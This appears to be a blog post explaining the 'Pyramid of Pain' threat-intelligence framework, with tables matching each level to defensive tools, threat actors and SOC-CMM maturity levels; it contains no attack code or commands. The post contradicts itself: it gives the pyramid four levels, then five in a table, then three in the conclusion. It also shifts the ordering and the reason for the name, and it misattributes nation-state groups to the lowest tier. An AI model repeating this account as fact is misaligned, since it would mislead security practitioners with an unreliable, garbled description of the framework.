Introduction:
The Pyramid of Pain is a framework used in the field of cybersecurity to help organizations better understand the tactics, techniques, and procedures (TTPs) used by attackers, and how to defend against them. It is called the “Pyramid of Pain” because it reflects the increasing level of effort and resources required by attackers to achieve their objectives.
The Pyramid of Pain consists of four levels:
- Indicators of Compromise (IOCs)
- Tactics, Techniques, and Procedures (TTPs)
- Information about Tools and Infrastructure
- Adversary Campaigns and Objectives
| Level | Description | Prevention Tools | Protection Tools | Detection Tools | Attacker Tools | Detection Sample |
| 1 | Indicators of Compromise (IOCs) | Anti-Virus, Firewalls, SIEM, IDS/IPS | EDR, Deception Technologies, MFA | EDR, SIEM, IDS/IPS | Malware kits, RATs, Botnets | SIEM detects a high number of failed login attempts from an external IP address |
| 2 | Tactics, Techniques, and Procedures (TTPs) | Network Segmentation, MFA, Deception Technologies | EDR, SIEM, Deception Technologies | EDR, SIEM | Credential harvesters, Port scanners, DNS spoofers | EDR detects an attempt to execute a known malicious script |
| 3 | Information about Tools and Infrastructure | IP Reputation Services, Domain Blacklists | Threat Intelligence Platforms, Passive DNS | Threat Intelligence Platforms, Passive DNS | Proxy servers, VPNs, TOR | Passive DNS lookup reveals multiple domains registered to the same email address |
| 4 | Adversary Campaigns and Objectives | Threat Intelligence Platforms | Red Teams, Threat Intelligence Platforms, Human Intelligence | Threat Intelligence Platforms, Human Intelligence | Advanced persistent threats (APTs), Cyber espionage groups | Threat Intelligence Platform reveals a new campaign targeting a specific industry sector |
Each level represents a different level of effort for an attacker to achieve their objective, with IOCs being the easiest to obtain and adversary campaigns and objectives being the most difficult.
How to Use the Pyramid of Pain:
The Pyramid of Pain can be used by organizations to develop a more comprehensive cybersecurity strategy that includes prevention, protection, and detection. By understanding the tactics used by attackers at each level, organizations can implement security controls and best practices that make it harder for attackers to succeed.
In terms of prevention, organizations can use IOCs to block known malicious activity, and implement security controls that make it harder for attackers to use TTPs. They can also use information about the tools and infrastructure used by attackers to identify and block new threats.
For protection, organizations can use threat intelligence to monitor for IOCs and TTPs associated with specific adversaries. They can also use network segmentation to limit the impact of a successful attack and prevent lateral movement by attackers.
In terms of detection, organizations can use threat intelligence to monitor for new TTPs used by attackers, and use behavioral analysis to detect unusual activity that may indicate an attack is in progress. They can also use adversary campaigns and objectives to identify patterns of behavior and motivation that may help them to identify new threats.
Level 1: Indicators of Compromise (IoCs)
Indicators of Compromise (IoCs) are specific artifacts that can be used to identify malicious activity. This includes things like IP addresses, domains, file hashes, and network traffic patterns.
Prevention: To prevent attacks using IoCs, organizations can implement security controls that prevent attackers from gaining a foothold on the network in the first place. This can include things like firewalls, intrusion prevention systems (IPS), and endpoint protection software.
Protection: To protect against attacks using IoCs, organizations can use threat intelligence feeds that provide information on known IoCs, so they can be blocked before they can be used to launch an attack. Organizations can also use automated tools that can quickly scan systems and identify any indicators of compromise.
Detection: To detect attacks using IoCs, organizations can use network monitoring tools that can detect anomalous network traffic, and security information and event management (SIEM) systems that can correlate events across different systems and identify potential threats.
Level 2: Tactics, Techniques, and Procedures (TTPs)
Tactics, Techniques, and Procedures (TTPs) are the specific methods that attackers use to achieve their objectives. This includes things like social engineering, malware delivery, and lateral movement.
Prevention: To prevent attacks using TTPs, organizations can implement security controls that are designed to detect and block these specific tactics. For example, they can use email filters to block phishing emails, and endpoint protection software to block malware delivery.
Protection: To protect against attacks using TTPs, organizations can use security controls that are designed to detect and block these specific tactics. This includes things like intrusion detection systems (IDS) that can detect lateral movement, and sandboxing technology that can identify and block new and unknown malware.
Detection: To detect attacks using TTPs, organizations can use behavioral analytics tools that can detect anomalous behavior, and machine learning algorithms that can identify patterns of behavior that are indicative of an attack.
Level 3: Information about Tools and Infrastructure
Information about Tools and Infrastructure refers to the specific tools and infrastructure that attackers use to carry out their attacks. This includes things like command and control servers, exploit kits, and remote access trojans (RATs).
Prevention: To prevent attacks using information about tools and infrastructure, organizations can implement security controls that are designed to block these specific tools and infrastructure. This can include things like web filtering tools that block access to known malicious websites, and intrusion prevention systems (IPS) that block traffic from known command and control servers.
Protection: To protect against attacks using information about tools and infrastructure, organizations can use security controls that are designed to detect and block these specific tools and infrastructure. For example, they can use network monitoring tools that can detect connections to known command and control servers, and endpoint protection software that can detect and block known RATs.
Detection: To detect attacks using information about tools and infrastructure, organizations can use threat intelligence feeds that provide information on known malicious tools and infrastructure, so they can be detected and blocked before they can be used to launch an attack.
Level 4: Adversary Campaigns and Objectives
Adversary Campaigns and Objectives refer to the larger strategies and motivations of attackers. This includes information about their targets, tactics, and overall objectives.
Prevention: To prevent attacks based on adversary campaigns and objectives, organizations can implement security controls and best practices that make it harder for attackers to succeed. For example, they can implement security awareness training programs that educate employees about the tactics used by attackers, so they can identify and report suspicious activity.
Protection: To
protect against attacks based on adversary campaigns and objectives, organizations can use threat intelligence to monitor for indicators of compromise (IOCs) that are associated with specific adversaries. This can help them to identify and block attacks before they can cause damage. They can also use network segmentation to limit the impact of a successful attack and prevent lateral movement by attackers.
Detection:
To detect attacks based on adversary campaigns and objectives, organizations can use threat intelligence to monitor for new tactics, techniques, and procedures (TTPs) used by specific adversaries. They can also use behavioral analysis to detect unusual activity that may indicate an attack is in progress. For example, they can monitor for large amounts of data being exfiltrated from the network or for unusual network traffic patterns.
Example:
An organization has received intelligence that a specific adversary group is targeting organizations in their industry with a new type of ransomware. Based on this information, the organization implements security controls to prevent the ransomware from entering their network, such as email filters and web content filters. They also implement security awareness training programs to educate employees about the tactics used by this adversary group, so they can identify and report any suspicious activity.
In terms of protection, the organization implements network segmentation to limit the impact of a successful attack and prevent lateral movement by the attackers. They also use threat intelligence to monitor for IOCs associated with the adversary group and block any attacks that are detected.
For detection, the organization uses behavioral analysis to detect any unusual activity on their network that may indicate an attack is in progress. They also use threat intelligence to monitor for new TTPs used by the adversary group and update their security controls accordingly.
Pyramid of Pain to the SOC-CMM maturity model:
| Pyramid of Pain Level | Prevention | Protection | Detection | Examples of Tools | Examples of Threat Actors | Examples of Attacks | SOC-CMM Maturity Level |
| 1: Indicators of Compromise (IoCs) | System hardening, patch management | Endpoint detection and response (EDR), antivirus, firewalls | SIEM, threat intelligence, log analysis | YARA, Snort, TCPDump, | Script kiddies, low-skilled hackers | Phishing, malware, ransomware, APT10, FIN7, Lazarus Group, Turla | Level 1: Initial |
| 2: Tactics, Techniques, and Procedures (TTPs) | Security awareness training, access controls | Intrusion prevention systems (IPS), web application firewalls (WAF) | Network traffic analysis, honey pots | Mimikatz, Metasploit, Cobalt Strike | Cybercriminals, hacktivists | DDoS attacks, SQL injection, cross-site scripting (XSS), APT28, APT33, Cobalt Group, Magecart | Level 2: Managed |
| 3: Information about Tools and Infrastructure | Web application security testing, vulnerability scanning | Network segmentation, encryption | Endpoint detection and response (EDR), threat hunting | Nmap, Nessus, Qualys | Nation-state actors, advanced persistent threats (APTs) | Advanced malware, spear phishing, zero-day exploits, Carbanak, DarkHydrus, OilRig, TA505 | Level 3: Defined |
| 4: Adversary Campaigns and Objectives | Security risk assessments, threat modeling | Security information and event management (SIEM), incident response (IR) | Threat intelligence, user behavior analytics (UBA) | Advanced persistent threats (APTs), nation-state actors | Nation-state actors, cyber terrorists | Supply chain attacks, intellectual property theft, Carbanak, DarkHydrus, OilRig, TA505 | Level 4: Managed and Measurable |
| 5: Indicators of Intent (IoIs) | Security culture and awareness programs, threat intelligence sharing | Identity and access management (IAM), data loss prevention (DLP) | Security information and event management (SIEM), machine learning (ML) | Dark web monitoring tools, honeynets | Nation-state actors, organized crime | Social engineering, advanced persistent threats (APTs), APT1, Sandworm, Sofacy, Turla | Level 5: Optimized |
Level 1: Indicators of Compromise (IoCs)
- Hash Values (e.g. SHA1, MD5): used to identify specific malicious files.
- IP Addresses: used to identify malicious servers or network traffic.
- Domain Names: used to identify malicious websites or C2 domains.
Level 2: Tactics, Techniques, and Procedures (TTPs)
- Network Artifacts: used to identify patterns or behaviors of malicious network activity.
- Host Artifacts: used to identify patterns or behaviors of malicious activity on a specific host.
- Tools: used to identify specific malware or tools used by attackers to conduct their operations.
Level 3: Information about Tools and Infrastructure
- Tools: used to identify specific malware or tools used by attackers to conduct their operations.
- Infrastructure: used to identify patterns or behaviors of malicious infrastructure used by attackers.
Level 4: Adversary Campaigns and Objectives
- Threat Actors: used to identify specific groups or individuals responsible for the attacks.
- Examples of Attacks: used to identify patterns or behaviors of attacks conducted by specific threat actors or groups.
Conclusion:
The Pyramid of Pain is a framework that cybersecurity professionals use to prioritize the collection and analysis of threat intelligence data. It is called a pyramid because it is structured like a triangle, with the most basic and widely available data at the bottom, and the most sensitive and difficult-to-obtain data at the top. The Pyramid of Pain is based on the principle that the more pain an attacker feels when a particular data source is compromised, the more valuable that data is for detecting and responding to threats.
Here is how the Pyramid of Pain can be used as a model for threat detection:
- Level 1: Indicator of Compromise (IoC) – At the bottom of the pyramid is the most basic and widely available data, which is indicators of compromise (IoCs). These can include IP addresses, domain names, email addresses, hashes, and other artifacts that suggest a system has been compromised. These indicators can be quickly collected and analyzed to determine whether a threat is present, but they are also easily changed by attackers.
- Level 2: Tactics, Techniques, and Procedures (TTPs) – Moving up the pyramid, TTPs represent a higher level of intelligence gathering that involves understanding how an attacker operates. This information can be used to identify patterns of behavior, which can be used to detect and respond to threats. TTPs can include information such as the tools, methods, and procedures that attackers use to exploit vulnerabilities and infiltrate systems.
- Level 3: Campaigns – At the top of the pyramid is campaign intelligence, which is the most sensitive and difficult-to-obtain data. This level of intelligence involves understanding the motivations and objectives of an attacker, as well as their strategic goals and the broader context of their activities. Campaign intelligence is the most valuable level of intelligence because it provides a more complete picture of the threat landscape, but it is also the most difficult to obtain and requires the most advanced analytics capabilities.
By using the Pyramid of Pain as a model for threat detection, security professionals can prioritize the collection and analysis of intelligence data based on the level of pain that would be inflicted on an attacker if that data were compromised. This enables security teams to focus their resources on the most valuable and actionable intelligence, which can lead to more effective threat detection and response.
The Pyramid of Pain is a useful framework for organizations to better understand the tactics used by attackers and how to defend against them. By using the Pyramid of Pain to develop a comprehensive cybersecurity strategy that includes prevention, protection, and detection, organizations can reduce their risk of being targeted by cyberattacks and minimize the damage caused by successful attacks.
ReZaAdineH 
Leave a comment